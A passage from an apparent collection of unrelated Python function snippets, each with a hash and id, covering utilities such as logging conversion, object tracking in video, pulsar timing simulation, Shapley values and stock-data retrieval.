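# Hedged usage sketch (not from the original source): the distance appears to
# wrap at 0.5, consistent with angles expressed as fractions of a full turn.
print(derivative_circ_dist(0.1, 0.3))  # t = 0.2  -> -1
print(derivative_circ_dist(0.1, 0.8))  # t = 0.7  ->  1
print(derivative_circ_dist(0.1, 0.6))  # t = 0.5  ->  0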
|
36a4cc04cda32e8c6e5896d405f96068def8be41
| 20,126 |
def get_MB_compatible_list(OpClass, lhs, rhs):
""" return a list of metablock instance implementing an operation of
type OpClass and compatible with format descriptor @p lhs and @p rhs
"""
fct_map = {
Addition: get_Addition_MB_compatible_list,
Multiplication: get_Multiplication_MB_compatible_list
}
return fct_map[OpClass](lhs, rhs)
|
172ca13f218f52e5834592fd09abf9444369d60c
| 20,127 |
import torch
import random
def create_mock_target(number_of_nodes, number_of_classes):
"""
Creating a mock target vector.
"""
return torch.LongTensor([random.randint(0, number_of_classes-1) for node in range(number_of_nodes)])
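# Hedged usage sketch (not from the original source):
target = create_mock_target(number_of_nodes=5, number_of_classes=3)
# e.g. tensor([2, 0, 1, 2, 0]) -- one random class label per node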
|
1be4d86a0291d24f0be555d4eea7d29f0994db29
| 20,128 |
def is_iterable(obj):
"""
Return true if object has iterator but is not a string
:param object obj: Any object
:return: True if object is iterable but not a string.
:rtype: bool
"""
return hasattr(obj, '__iter__') and not isinstance(obj, str)
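# Hedged usage sketch (not from the original source):
print(is_iterable([1, 2]))  # True
print(is_iterable("abc"))   # False (strings are excluded on purpose)
print(is_iterable(42))      # False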
|
c7a1353f7f62a567a65d0c4752976fefde6e1904
| 20,129 |
import logging
def convert_loglevstr_to_loglevint(loglevstr):
""" returns logging.NOTSET if we fail to match string """
if loglevstr.lower() == "critical":
return logging.CRITICAL
if loglevstr.lower() == "error":
return logging.ERROR
if loglevstr.lower() == "warning":
return logging.WARNING
if loglevstr.lower() == "info":
return logging.INFO
if loglevstr.lower() == "debug":
return logging.DEBUG
return logging.NOTSET
|
7d821ac54368012f60c220fd2f8d56267daa0006
| 20,130 |
def get_operator_module(operator_string):
"""
Get module name
"""
# the module, for when the operator is not a local operator
operator_path = ".".join(operator_string.split(".")[:-1])
assert len(operator_path) != 0, (
"Please specify a format like 'package.operator' to specify your operator. You passed in '%s'"
% operator_string
)
return operator_path
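# Hedged usage sketch (not from the original source; the operator path is hypothetical):
print(get_operator_module("mypackage.operators.MyOperator"))  # -> 'mypackage.operators'
# A bare name such as "MyOperator" has no package part and triggers the AssertionError.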
|
82b4ddc419b09b5874debbe64262b4a4f414cb8f
| 20,131 |
from fractions import Fraction  # assumed: the standard-library Fraction type
def is_fraction(obj):
"""Test whether the object is a valid fraction.
"""
return isinstance(obj, Fraction)
|
ab0a1b11274f837f479fb62648a144f0e689b499
| 20,132 |
def getExtrusion(matrix):
"""calculates DXF-Extrusion = Arbitrary Xaxis and Zaxis vectors
"""
AZaxis = matrix[2].copy().resize3D().normalize() # = ArbitraryZvector
Extrusion = [AZaxis[0],AZaxis[1],AZaxis[2]]
if AZaxis[2]==1.0:
Extrusion = None
AXaxis = matrix[0].copy().resize3D() # = ArbitraryXvector
else:
threshold = 1.0 / 64.0
if abs(AZaxis[0]) < threshold and abs(AZaxis[1]) < threshold:
# AXaxis is the intersection WorldPlane and ExtrusionPlane
AXaxis = M_CrossVecs(WORLDY,AZaxis)
else:
AXaxis = M_CrossVecs(WORLDZ,AZaxis)
#print 'deb:\n' #-------------
#print 'deb:getExtrusion() Extrusion=', Extrusion #---------
return Extrusion, AXaxis.normalize()
|
ec6133bddc9093310ffe1e807ae24882aa24edc3
| 20,133 |
def _build_class_include(env, class_name):
"""
If parentns::classname is included and fabric
properties such as puppet_parentns__classname_prop = val1
are set, the class included in puppet will be something like
class { 'parentns::classname':
prop => 'val1',
}
"""
include_def = "class { '%s': \n" % class_name
property_prefix = _property_prefix(class_name)
for name, value in env.items():
if name.startswith(property_prefix):
property_name = name[len(property_prefix):]
if not property_name.startswith("_"): # else subclass property
include_def += " %s => '%s',\n" % (property_name, value)
include_def += "\n}"
return include_def
|
f58633fefb3ca853ef292f554eea4f98126c3ecb
| 20,134 |
async def mention_html(user_id, name):
"""
The function is designed to output a link to a telegram.
"""
return f'<a href="tg://user?id={user_id}">{escape(name)}</a>'
|
eed9dd188f36e4d23bb16e274382372c6464f890
| 20,135 |
import pyamf
from plasma.flex.messaging.messages import small
def blaze_loader(alias):
"""
Loader for BlazeDS framework compatibility classes, specifically
implementing ISmallMessage.
.. seealso:: `BlazeDS (external)
<http://opensource.adobe.com/wiki/display/blazeds/BlazeDS>`_
:since: 0.1
"""
if alias not in ['DSC', 'DSK', 'DSA']:
return
reload(small)
return pyamf.get_class_alias(alias)
|
956acd6aa9c36c186081a43e271b6a3c61b7a53f
| 20,136 |
from mysql.connector import Error  # assumed: mysql-connector, matching cursor(dictionary=True) / is_connected()
def get_user_pic(user_id, table):
"""Get a user's profile picture filename from the database.
Args:
user_id ([int]): [User id]
table ([string]): [Table target]
Returns:
[string]: [Filename]
"""
try:
connection = database_cred()
cursor = connection.cursor()
cursor = connection.cursor(dictionary=True)
if table == "admin":
cursor.execute(
'SELECT admin_pic FROM admin WHERE admin_id=%s', (user_id,))
if table == "user":
cursor.execute(
'SELECT user_pic FROM user WHERE user_id=%s', (user_id,))
records = cursor.fetchall()
except Error as e:
print("parameterized query failed {}".format(e))
finally:
if connection.is_connected():
connection.close()
cursor.close()
return records
|
28ea65c793e88b967889fa39dc8588e4afd75e91
| 20,137 |
import tensorflow as tf  # TF1-style API (string_input_producer, WholeFileReader)
def convert_file_format(files, size):
"""
Takes filename queue and returns an example from it
using the TF Reader structure
"""
filename_queue = tf.train.string_input_producer(files,shuffle=True)
image_reader = tf.WholeFileReader()
_,image_file = image_reader.read(filename_queue)
image = tf.image.decode_jpeg(image_file)
image = tf.image.resize_images(image, [size,size])
image.set_shape((size,size,3))
return image
|
0a889dbf8b851716f7a7788cee6cc1f7e7b4c0fc
| 20,138 |
def validate_access_rule(supported_access_types, supported_access_levels,
access_rule, abort=False):
"""Validate an access rule.
:param access_rule: Access rules to be validated.
:param supported_access_types: List of access types that are regarded
valid.
:param supported_access_levels: List of access levels that are
regarded valid.
:param abort: a boolean value that indicates if an exception should
be raised when the rule is invalid.
:return: Boolean.
"""
errmsg = _("Unsupported access rule of 'type' %(access_type)s, "
"'level' %(access_level)s, 'to' %(access_to)s: "
"%(field)s should be one of %(supported)s.")
access_param = access_rule.to_dict()
def validate(field, supported_tokens, excinfo):
if access_rule['access_%s' % field] in supported_tokens:
return True
access_param['field'] = field
access_param['supported'] = ', '.join(
"'%s'" % x for x in supported_tokens)
if abort:
LOG.error(errmsg, access_param)
raise excinfo['type'](
**{excinfo['about']: excinfo['details'] % access_param})
else:
LOG.warning(errmsg, access_param)
return False
valid = True
valid &= validate(
'type', supported_access_types,
{'type': exception.InvalidShareAccess, 'about': "reason",
'details': _(
"%(access_type)s; only %(supported)s access type is allowed")})
valid &= validate(
'level', supported_access_levels,
{'type': exception.InvalidShareAccessLevel, 'about': "level",
'details': "%(access_level)s"})
return valid
|
2ce7ba446ec583b5b46dbd6a8eceeafe6cc46a6e
| 20,139 |
import cv2
from tqdm import tqdm
def track_viou_video(video_path, detections, sigma_l, sigma_h, sigma_iou, t_min, ttl, tracker_type, keep_upper_height_ratio):
""" V-IOU Tracker.
See "Extending IOU Based Multi-Object Tracking by Visual Information by E. Bochinski, T. Senst, T. Sikora" for
more information.
Args:
video_path (str): path to the input video file (frames are read with cv2.VideoCapture).
detections (list): list of detections per frame, usually generated by util.load_mot
sigma_l (float): low detection threshold.
sigma_h (float): high detection threshold.
sigma_iou (float): IOU threshold.
t_min (float): minimum track length in frames.
ttl (float): maximum number of frames to perform visual tracking.
this can fill 'gaps' of up to 2*ttl frames (ttl times forward and backward).
tracker_type (str): name of the visual tracker to use. see VisTracker for more details.
keep_upper_height_ratio (float): float between 0.0 and 1.0 that determines the ratio of height of the object
to track to the total height of the object used for visual tracking.
Returns:
list: list of tracks.
"""
if tracker_type == 'NONE':
assert ttl == 1, "ttl should not be larger than 1 if no visual tracker is selected"
tracks_active = []
tracks_extendable = []
tracks_finished = []
frame_buffer = []
vid = cv2.VideoCapture(video_path)
if not vid.isOpened():
raise IOError("Couldn't open webcam or video")
for frame_num, detections_frame in enumerate(tqdm(detections), start=1):
# load frame and put into buffer
# frame_path = frames_path.format(frame_num)
# frame = cv2.imread(frame_path)
return_value, frame = vid.read()
if return_value != True:
break
if return_value:
# frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
# image = Image.fromarray(frame)
# print('image:',image)
pass
else:
raise ValueError("No image!")
assert frame is not None, "could not read frame {} of '{}'".format(frame_num, video_path)
frame_buffer.append(frame)
if len(frame_buffer) > ttl + 1:
frame_buffer.pop(0)
# apply low threshold to detections
dets = [det for det in detections_frame if det['score'] >= sigma_l]
track_ids, det_ids = associate(tracks_active, dets, sigma_iou)
updated_tracks = []
for track_id, det_id in zip(track_ids, det_ids):
tracks_active[track_id]['bboxes'].append(dets[det_id]['bbox'])
tracks_active[track_id]['max_score'] = max(tracks_active[track_id]['max_score'], dets[det_id]['score'])
tracks_active[track_id]['classes'].append(dets[det_id]['class'])
tracks_active[track_id]['det_counter'] += 1
if tracks_active[track_id]['ttl'] != ttl:
# reset visual tracker if active
tracks_active[track_id]['ttl'] = ttl
tracks_active[track_id]['visual_tracker'] = None
updated_tracks.append(tracks_active[track_id])
tracks_not_updated = [tracks_active[idx] for idx in set(range(len(tracks_active))).difference(set(track_ids))]
for track in tracks_not_updated:
if track['ttl'] > 0:
if track['ttl'] == ttl:
# init visual tracker
track['visual_tracker'] = VisTracker(tracker_type, track['bboxes'][-1], frame_buffer[-2],
keep_upper_height_ratio)
# viou forward update
ok, bbox = track['visual_tracker'].update(frame)
if not ok:
# visual update failed, track can still be extended
tracks_extendable.append(track)
continue
track['ttl'] -= 1
track['bboxes'].append(bbox)
updated_tracks.append(track)
else:
tracks_extendable.append(track)
# update the list of extendable tracks. tracks that are too old are moved to the finished_tracks. this should
# not be necessary but may improve the performance for large numbers of tracks (eg. for mot19)
tracks_extendable_updated = []
for track in tracks_extendable:
if track['start_frame'] + len(track['bboxes']) + ttl - track['ttl'] >= frame_num:
tracks_extendable_updated.append(track)
elif track['max_score'] >= sigma_h and track['det_counter'] >= t_min:
tracks_finished.append(track)
tracks_extendable = tracks_extendable_updated
new_dets = [dets[idx] for idx in set(range(len(dets))).difference(set(det_ids))]
dets_for_new = []
for det in new_dets:
finished = False
# go backwards and track visually
boxes = []
vis_tracker = VisTracker(tracker_type, det['bbox'], frame, keep_upper_height_ratio)
for f in reversed(frame_buffer[:-1]):
ok, bbox = vis_tracker.update(f)
if not ok:
# can not go further back as the visual tracker failed
break
boxes.append(bbox)
# sorting is not really necessary but helps to avoid different behaviour for different orderings
# preferring longer tracks for extension seems intuitive, LAP solving might be better
for track in sorted(tracks_extendable, key=lambda x: len(x['bboxes']), reverse=True):
offset = track['start_frame'] + len(track['bboxes']) + len(boxes) - frame_num
# association not optimal (LAP solving might be better)
# association is performed at the same frame, not adjacent ones
if 1 <= offset <= ttl - track['ttl'] and iou(track['bboxes'][-offset], bbox) >= sigma_iou:
if offset > 1:
# remove existing visually tracked boxes behind the matching frame
track['bboxes'] = track['bboxes'][:-offset+1]
track['bboxes'] += list(reversed(boxes))[1:]
track['bboxes'].append(det['bbox'])
track['max_score'] = max(track['max_score'], det['score'])
track['classes'].append(det['class'])
track['ttl'] = ttl
track['visual_tracker'] = None
tracks_extendable.remove(track)
if track in tracks_finished:
del tracks_finished[tracks_finished.index(track)]
updated_tracks.append(track)
finished = True
break
if finished:
break
if not finished:
dets_for_new.append(det)
# create new tracks
new_tracks = [{'bboxes': [det['bbox']], 'max_score': det['score'], 'start_frame': frame_num, 'ttl': ttl,
'classes': [det['class']], 'det_counter': 1, 'visual_tracker': None} for det in dets_for_new]
tracks_active = []
for track in updated_tracks + new_tracks:
if track['ttl'] == 0:
tracks_extendable.append(track)
else:
tracks_active.append(track)
# finish all remaining active and extendable tracks
tracks_finished = tracks_finished + \
[track for track in tracks_active + tracks_extendable
if track['max_score'] >= sigma_h and track['det_counter'] >= t_min]
# remove last visually tracked frames and compute the track classes
for track in tracks_finished:
if ttl != track['ttl']:
track['bboxes'] = track['bboxes'][:-(ttl - track['ttl'])]
track['class'] = max(set(track['classes']), key=track['classes'].count)
del track['visual_tracker']
# debug
# print(data)
f = open('debug.txt', 'w')
f.write(str(tracks_finished))
f.close()
return tracks_finished
|
c2167172943e0fb45311c109aa932adee9dcbe17
| 20,140 |
from typing import TypeVar
SHAPE = TypeVar("SHAPE")  # assumed: TypeVar expressing "same iterable type in, same type out"
def deduplicate(inp: SHAPE) -> SHAPE:
"""
Remove duplicates from any iterable while retaining the order of elements.
:param inp: iterable to deduplicate
:return: new, unique iterable of same type as input
"""
return type(inp)(dict.fromkeys(list(inp)))
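# Hedged usage sketch (not from the original source): order is preserved and the
# input's type is reproduced.
print(deduplicate([3, 1, 3, 2, 1]))   # [3, 1, 2]
print(deduplicate(("a", "b", "a")))   # ('a', 'b')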
|
d80ad3e00ce0bfa9a0625308267c5e25d8e3f3c9
| 20,141 |
def access_rules_synchronized(f):
"""Decorator for synchronizing share access rule modification methods."""
def wrapped_func(self, *args, **kwargs):
# The first argument is always a share, which has an ID
key = "share-access-%s" % args[0]['id']
@utils.synchronized(key)
def source_func(self, *args, **kwargs):
return f(self, *args, **kwargs)
return source_func(self, *args, **kwargs)
return wrapped_func
|
03fe6b1905d825de1f20ed2967eb003f96fb2cce
| 20,142 |
from importlib import import_module
def import_python(path, package=None):
"""Get python module or object.
Parameters
----------
path : str
Fully-qualified python path, i.e. `package.module:object`.
package : str or None
Package name to use as an anchor if `path` is relative.
"""
parts = path.split(':')
if len(parts) > 2:
msg = f"Not a correct path ('{path}' has more than one object qualifier)"
raise ValueError(msg)
if len(parts) == 2:
module_path, obj = parts
else:
module_path, obj = path, None
module = import_module(module_path, package=package)
if obj:
return getattr(module, obj)
return module
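# Hedged usage sketch (not from the original source):
join = import_python("os.path:join")  # the join function from os.path
os_path = import_python("os.path")    # the os.path module itself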
|
ff2755964c0c24c5366e3243a1b2997176b33a4c
| 20,143 |
from typing import Callable
from typing import Awaitable
async def feature_flags_scope_per_request(
request: Request, call_next: Callable[[Request], Awaitable[Response]]
) -> Response:
"""Use new feature flags copy for each request."""
# Create new copy of the feature flags, as we'll be modifying them later
# and do not want to change our system-wide feature flags.
with ff_ctx as feature_flags:
# FastAPI provides its own dependency injection mechanism, but just
# in case you are using starlette directly or there any other pure
# ASGI middlewares.
request.scope["feature_flags"] = feature_flags
return await call_next(request)
|
9169a2f66f7fa60066695cfef5a320eedd566145
| 20,144 |
import tempfile
import os
import libstempo
def fakepulsar(parfile, obstimes, toaerr, freq=1440.0, observatory="AXIS", flags="", iters=3):
"""Returns a libstempo tempopulsar object corresponding to a noiseless set
of observations for the pulsar specified in 'parfile', with observations
happening at times (MJD) given in the array (or list) 'obstimes', with
measurement errors given by toaerr (us).
A new timfile can then be saved with pulsar.savetim(). Re the other parameters:
- 'toaerr' needs to be either a common error, or a list of errors
of the same length of 'obstimes';
- 'freq' can be either a common observation frequency in MHz, or a list;
it defaults to 1440;
- 'observatory' can be either a common observatory name, or a list;
it defaults to the IPTA MDC 'AXIS';
- 'flags' can be a string (such as '-sys EFF.EBPP.1360') or a list of strings;
it defaults to an empty string;
- 'iters' is the number of iterative removals of computed residuals from TOAs
(which is how the fake pulsar is made...)"""
outfile = tempfile.NamedTemporaryFile(delete=False)
outfile.write(b"FORMAT 1\n")
outfile.write(b"MODE 1\n")
obsname = "fake_" + os.path.basename(parfile)
if obsname[-4:] == ".par":
obsname = obsname[:-4]
for i, t in enumerate(obstimes):
outfile.write(
"{0} {1} {2} {3} {4} {5}\n".format(
obsname, _geti(freq, i), t, _geti(toaerr, i), _geti(observatory, i), _geti(flags, i)
).encode("ascii")
)
timfile = outfile.name
outfile.close()
pulsar = libstempo.tempopulsar(parfile, timfile, dofit=False)
for i in range(iters):
pulsar.stoas[:] -= pulsar.residuals() / 86400.0
pulsar.formbats()
os.remove(timfile)
return pulsar
|
e40ea56e7fa460a651898d6a73b4d3aa661ae174
| 20,145 |
def get_scenes_need_processing(config_file, sensors):
"""
A function which finds all the processing steps for all the scenes which haven't yet been undertaken.
This is per scene processing rather than per step processing in the functions above.
Steps include:
* Download
* ARD Production
* Generating Tile Cache
* Generating Quicklook images
:param config_file: The EODataDown configuration file path.
:param sensors: list of sensor string names to be processed.
:returns: a list of lists where each scn has [config_file, scn_sensor, scn_id]
"""
sys_main_obj = eodatadown.eodatadownsystemmain.EODataDownSystemMain()
sys_main_obj.parse_config(config_file)
tasks = []
for sensor in sensors:
sensor_obj = sys_main_obj.get_sensor_obj(sensor)
scn_ids = []
if sensor_obj.calc_scn_usr_analysis():
scns = sensor_obj.get_scnlist_usr_analysis()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
if sensor_obj.calc_scn_tilecache():
scns = sensor_obj.get_scnlist_tilecache()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
if sensor_obj.calc_scn_quicklook():
scns = sensor_obj.get_scnlist_quicklook()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
scns = sensor_obj.get_scnlist_con2ard()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
scns = sensor_obj.get_scnlist_download()
for scn in scns:
if scn not in scn_ids:
tasks.append([config_file, sensor, scn])
scn_ids.append(scn)
return tasks
|
a600cd352980184ebe8382a5cabf9d8b09d9f688
| 20,146 |
import numpy as np
def startingStateDistribution(env, N=100000):
"""
This function samples initial states for the environment and computes
an empirical estimator for the starting distribution mu_0
"""
rdInit = []
sample = {}
# Computing the starting state distribution
mu_0 = np.zeros((env.n_states,1))
for i in range(N):
rdInit.append(env.reset())
for i in range(0, env.n_states):
sample[i] = rdInit.count(i)
mu_0[i] = sample[i]/N
return mu_0
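# Hedged usage sketch (not from the original source): a toy environment exposing
# the interface the function relies on (an n_states attribute and a reset()
# method returning a state index).
import random

class ToyEnv:
    n_states = 3
    def reset(self):
        return random.choices([0, 1, 2], weights=[0.5, 0.3, 0.2])[0]

mu_0 = startingStateDistribution(ToyEnv(), N=10000)
# mu_0 is a (3, 1) column vector, approximately [[0.5], [0.3], [0.2]]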
|
2685ebe6315a085ffdabbb82786499191c33d957
| 20,147 |
from pathlib import Path
import itertools
import copy
import math
import csv
import numpy as np
import pandas as pd
def get_shapley(csv_filename, modalities = ["t1", "t1ce", "t2", "flair"]):
"""
calculate modality shapeley value
CSV with column: t1, t1c, t2, flair, of 0 / 1. and perforamnce value.
:param csv:
:return:
"""
# convert csv to dict: {(0, 0, 1, 0): 10} {tuple: performance}
df = pd.read_csv(csv_filename)
fold = Path(csv_filename).name.split('.')[0].split('_')[-1]
# print(fold)
df_dict = df.to_dict(orient='records')
# print(df_dict)
v_dict = {} #
for row in df_dict:
mod_lst = []
for m in modalities:
mod_lst.append(row[m])
v_dict[tuple(mod_lst)] = row['accuracy']
# print(v_dict)
n = len(modalities)
# sanity check that all modality combinations exist
N_sets = list(itertools.product([0,1],repeat = len(modalities))) # set of all_combinations
for s in N_sets:
if tuple(s) not in v_dict:
print("ERROR in get_shapley! {} missing".format(s))
N_sets_array = np.array(N_sets) # array([[0, 0, 0, 0], [0, 0, 0, 1],
mod_shapley = {}
# for each mod, calculate its shapley value:
for i, mod in enumerate(modalities):
# get combination not including mod
n_not_i = N_sets_array[N_sets_array[:, i]==0]  # all subsets that do not contain i
# print(n_not_i, i)
phi_i= 0
for s in n_not_i:
# print('s', s)
v_s = v_dict[tuple(s)]
sANDi = copy.deepcopy(s)
sANDi[i] =1
v_sANDi = v_dict[tuple(sANDi)]
# print(s , s.sum(), i, mod)
phi_i += (v_sANDi - v_s) * math.factorial(s.sum()) * (math.factorial(n - s.sum() - 1)) / math.factorial(n)
mod_shapley[mod] = phi_i
mod_shapley['fold'] = fold
print(mod_shapley)
# save gt shapley to csv
with open(Path(csv_filename).parent/'fold_{}_modality_shapley.csv'.format(fold), 'w') as f:
csv_writer = csv.DictWriter(f, fieldnames=list(mod_shapley.keys()))
csv_writer.writeheader()
csv_writer.writerow(mod_shapley)
# for key in mod_shapley.keys():
# f.write("%s,%s\n" % (key, mod_shapley[key]))
return mod_shapley
|
ba80c0a9a17b7f86b909cbeb9829b6b8cc20f1ca
| 20,148 |
def get_changepoint_values_from_config(
changepoints_dict,
time_features_df,
time_col=cst.TIME_COL):
"""Applies the changepoint method specified in `changepoints_dict` to return the changepoint values
:param changepoints_dict: Optional[Dict[str, any]]
Specifies the changepoint configuration.
"method": str
The method to locate changepoints. Valid options:
"uniform". Places n_changepoints evenly spaced changepoints to allow growth to change.
"custom". Places changepoints at the specified dates.
Additional keys to provide parameters for each particular method are described below.
"continuous_time_col": Optional[str]
Column to apply `growth_func` to, to generate changepoint features
Typically, this should match the growth term in the model
"growth_func": Optional[func]
Growth function (scalar -> scalar). Changepoint features are created
by applying `growth_func` to "continuous_time_col" with offsets.
If None, uses identity function to use `continuous_time_col` directly
as growth term
If changepoints_dict["method"] == "uniform", this other key is required:
"n_changepoints": int
number of changepoints to evenly space across training period
If changepoints_dict["method"] == "custom", this other key is required:
"dates": Iterable[Union[int, float, str, datetime]]
Changepoint dates. Must be parsable by pd.to_datetime.
Changepoints are set at the closest time on or after these dates
in the dataset.
:param time_features_df: pd.Dataframe
training dataset. contains column "continuous_time_col"
:param time_col: str
The column name in `time_features_df` representing time for the time series data
The time column can be anything that can be parsed by pandas DatetimeIndex
Used only in the "custom" method.
:return: np.array
values of df[continuous_time_col] at the changepoints
"""
changepoint_values = None
if changepoints_dict is not None:
valid_changepoint_methods = ["uniform", "custom"]
changepoint_method = changepoints_dict.get("method")
continuous_time_col = changepoints_dict.get("continuous_time_col")
if changepoint_method is None:
raise Exception("changepoint method must be specified")
if changepoint_method not in valid_changepoint_methods:
raise NotImplementedError(
f"changepoint method {changepoint_method} not recognized. "
f"Must be one of {valid_changepoint_methods}")
if changepoint_method == "uniform":
if changepoints_dict["n_changepoints"] > 0:
params = {"continuous_time_col": continuous_time_col} if continuous_time_col is not None else {}
changepoint_values = get_evenly_spaced_changepoints_values(
df=time_features_df,
n_changepoints=changepoints_dict["n_changepoints"],
**params)
elif changepoint_method == "custom":
params = {}
if time_col is not None:
params["time_col"] = time_col
if continuous_time_col is not None:
params["continuous_time_col"] = continuous_time_col
changepoint_values = get_custom_changepoints_values(
df=time_features_df,
changepoint_dates=changepoints_dict["dates"],
**params)
return changepoint_values
|
0c38283e5744f180fbd326a549a4ee37b461c213
| 20,149 |
import logging
import scipy as SP  # assumed alias; older scipy exposes trace/eye at the top level
from scipy import linalg
def jitChol(A, maxTries=10, warning=True):
"""Do a Cholesky decomposition with jitter.
Description:
U, jitter = jitChol(A, maxTries, warning) attempts a Cholesky
decomposition on the given matrix, if matrix isn't positive
definite the function adds 'jitter' and tries again. Thereafter
the amount of jitter is multiplied by 10 each time it is added
again. This is continued for a maximum of 10 times. The amount of
jitter added is returned.
Returns:
U - the Cholesky decomposition for the matrix.
jitter - the amount of jitter that was added to the matrix.
Arguments:
A - the matrix for which the Cholesky decomposition is required.
maxTries - the maximum number of times that jitter is added before
giving up (default 10).
warning - whether to give a warning for adding jitter (default is True)
See also
CHOL, PDINV, LOGDET
Copyright (c) 2005, 2006 Neil D. Lawrence
"""
jitter = 0
i = 0
while(True):
try:
# Try --- need to check A is positive definite
if jitter == 0:
jitter = abs(SP.trace(A))/A.shape[0]*1e-6
LC = linalg.cholesky(A, lower=True)
return LC.T, 0.0
else:
if warning:
# pdb.set_trace()
# plt.figure()
# plt.imshow(A, interpolation="nearest")
# plt.colorbar()
# plt.show()
logging.error("Adding jitter of %f in jitChol()." % jitter)
LC = linalg.cholesky(A+jitter*SP.eye(A.shape[0]), lower=True)
return LC.T, jitter
except linalg.LinAlgError:
# Seems to have been non-positive definite.
if i<maxTries:
jitter = jitter*10
else:
raise linalg.LinAlgError("Matrix non positive definite, jitter of " + str(jitter) + " added but failed after " + str(i) + " trials.")
i += 1
return LC
|
ac2cbc35a3a0c33208456765512893554d91f75c
| 20,150 |
import requests
import pandas as pd
def stock_individual_info_em(symbol: str = "603777") -> pd.DataFrame:
"""
Eastmoney - individual stock - basic stock information
http://quote.eastmoney.com/concept/sh603777.html?from=classic
:param symbol: stock code
:type symbol: str
:return: stock information
:rtype: pandas.DataFrame
"""
code_id_dict = code_id_map_em()
url = "http://push2.eastmoney.com/api/qt/stock/get"
params = {
'ut': 'fa5fd1943c7b386f172d6893dbfba10b',
'fltt': '2',
'invt': '2',
'fields': 'f120,f121,f122,f174,f175,f59,f163,f43,f57,f58,f169,f170,f46,f44,f51,f168,f47,f164,f116,f60,f45,f52,f50,f48,f167,f117,f71,f161,f49,f530,f135,f136,f137,f138,f139,f141,f142,f144,f145,f147,f148,f140,f143,f146,f149,f55,f62,f162,f92,f173,f104,f105,f84,f85,f183,f184,f185,f186,f187,f188,f189,f190,f191,f192,f107,f111,f86,f177,f78,f110,f262,f263,f264,f267,f268,f255,f256,f257,f258,f127,f199,f128,f198,f259,f260,f261,f171,f277,f278,f279,f288,f152,f250,f251,f252,f253,f254,f269,f270,f271,f272,f273,f274,f275,f276,f265,f266,f289,f290,f286,f285,f292,f293,f294,f295',
"secid": f"{code_id_dict[symbol]}.{symbol}",
'_': '1640157544804',
}
r = requests.get(url, params=params)
data_json = r.json()
temp_df = pd.DataFrame(data_json)
temp_df.reset_index(inplace=True)
del temp_df['rc']
del temp_df['rt']
del temp_df['svr']
del temp_df['lt']
del temp_df['full']
code_name_map = {
'f57': '股票代码',
'f58': '股票简称',
'f84': '总股本',
'f85': '流通股',
'f127': '行业',
'f116': '总市值',
'f117': '流通市值',
'f189': '上市时间',
}
temp_df['index'] = temp_df['index'].map(code_name_map)
temp_df = temp_df[pd.notna(temp_df['index'])]
if 'dlmkts' in temp_df.columns:
del temp_df['dlmkts']
temp_df.columns = [
'item',
'value',
]
temp_df.reset_index(inplace=True, drop=True)
return temp_df
|
6d04941cb1aeaed49450eff61e957aab26bbf21a
| 20,151 |
def InverseDynamicsTool_safeDownCast(obj):
"""
InverseDynamicsTool_safeDownCast(OpenSimObject obj) -> InverseDynamicsTool
Parameters
----------
obj: OpenSim::Object *
"""
return _tools.InverseDynamicsTool_safeDownCast(obj)
|
3060244716c54e10953df5aa8db1c55076a040a2
| 20,152 |
import os
import re
def in_incident_root(current_dir_path):
"""
Helper function to determine if a sub directory is a child of an incident directory. This is useful for setting
default params in tools that has an incident directory as an input
:param current_dir_path: String of the path being evaluated
:return: tuple of (parent directory path, boolean indicating if the parent directory matches the incident dir pattern)
"""
parent_dir_path, current_dir_name = os.path.split(current_dir_path)
is_root_dir = False
if current_dir_name == 'tools':
parent_dir_name = os.path.basename(parent_dir_path)
if re.match(r'\d{4}_[a-zA-Z]*', parent_dir_name):
is_root_dir = True
return parent_dir_path.lower(), is_root_dir
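# Usage sketch (illustrative, not part of the original source): a "tools"
# folder inside an incident directory named like "2021_wildfire" is recognized
# as living under an incident root. The path below is hypothetical.
def _example_in_incident_root():
    parent, is_root = in_incident_root("/data/2021_wildfire/tools")
    return parent, is_root   # ("/data/2021_wildfire", True)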
|
62b8f9d9bddcc8ecfa232a65f205bd8414320928
| 20,153 |
from keras.layers import Input, Dense
from keras.models import Model
def build_decoder(encoding_dim, sparse):
    """Build and return the decoder linked with the encoder."""
input_img = Input(shape=(28*28,))
encoder = build_encoder(encoding_dim,sparse)
input_encoded = encoder(input_img)
decoded = Dense(64, activation='relu')(input_encoded)
decoded = Dense(128, activation='relu')(decoded)
decoded = Dense(28*28,activation='relu')(decoded)
decoder = Model(input_img,decoded)
return decoder
|
207535e38fd45e7ea6e0143c34607213747328ba
| 20,154 |
def find_usable_exits(room, stuff):
"""
Given a room, and the player's stuff, find a list of exits that they can use right now.
That means the exits must not be hidden, and if they require a key, the player has it.
    RETURNS
    - a list of exits that are usable right now: visible (not hidden) and, if a key is required, the player has it
    - a list of exits whose required key the player is missing
    """
usable = []
missing_key = []
for exit in room['exits']:
if exit.get("hidden", False):
continue
if "required_key" in exit:
if exit["required_key"] in stuff:
usable.append(exit)
continue
else:
missing_key.append(exit)
usable.append(exit)
continue
continue
usable.append(exit)
return usable, missing_key
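# Usage sketch (illustrative, not part of the original source): hidden exits
# are skipped, and keyed exits are split by whether the player carries the
# required key. The room layout below is made up.
def _example_find_usable_exits():
    room = {"exits": [
        {"destination": "hall"},
        {"destination": "vault", "required_key": "gold key"},
        {"destination": "attic", "hidden": True},
    ]}
    usable, missing = find_usable_exits(room, ["lantern"])
    return usable, missing   # ([hall exit], [vault exit])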
|
529bacbf33b5680774b291782fdcefe650cafeca
| 20,155 |
import tensorflow as tf
def get_normal_map(x, area_weighted=False):
"""
x: [bs, h, w, 3] (x,y,z) -> (nx,ny,nz)
"""
nn = 6
p11 = x
p = tf.pad(x, tf.constant([[0,0], [1,1], [1,1], [0,0]]))
p11 = p[:, 1:-1, 1:-1, :]
p10 = p[:, 1:-1, 0:-2, :]
p01 = p[:, 0:-2, 1:-1, :]
p02 = p[:, 0:-2, 2:, :]
p12 = p[:, 1:-1, 2:, :]
p20 = p[:, 2:, 0:-2, :]
p21 = p[:, 2:, 1:-1, :]
pos = [p10, p01, p02, p12, p21, p20]
for i in range(nn):
pos[i] = tf.subtract(pos[i], p11)
normals = []
for i in range(1, nn):
normals.append(tf.cross(pos[i%nn], pos[(i-1+nn)%nn]))
